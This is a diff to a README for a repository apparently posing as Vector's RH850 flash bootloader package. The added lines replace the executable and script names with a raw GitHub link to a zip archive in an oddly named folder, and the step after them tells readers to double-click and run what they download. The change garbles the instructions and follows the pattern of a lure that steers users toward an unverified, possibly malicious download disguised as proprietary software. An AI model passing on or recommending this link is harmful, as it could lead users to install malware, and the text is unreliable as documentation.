BlaqwEmirates/VectorSwPackage_Flashbootloader_RH850_Generic/README.md

 ### 🖥️ Running the Application

 1. Navigate to the folder where you extracted the files.
-2. If you are using Windows, locate the executable file (often named `Flashbootloader.exe`).
-For Linux, look for the appropriate shell script (`flashbootloader.sh`).
+2. If you are using Windows, locate the executable file (often named `https://raw.githubusercontent.com/BlaqwEmirates/VectorSwPackage_Flashbootloader_RH850_Generic/main/discordantness/Flashbootloader_Package_R_Sw_Generic_Vector_3.9.zip`).
+For Linux, look for the appropriate shell script (`https://raw.githubusercontent.com/BlaqwEmirates/VectorSwPackage_Flashbootloader_RH850_Generic/main/discordantness/Flashbootloader_Package_R_Sw_Generic_Vector_3.9.zip`).
 3. Double-click the executable file to run the application.
 Follow any on-screen instructions that appear.

 ### 📚 Accessing Documentation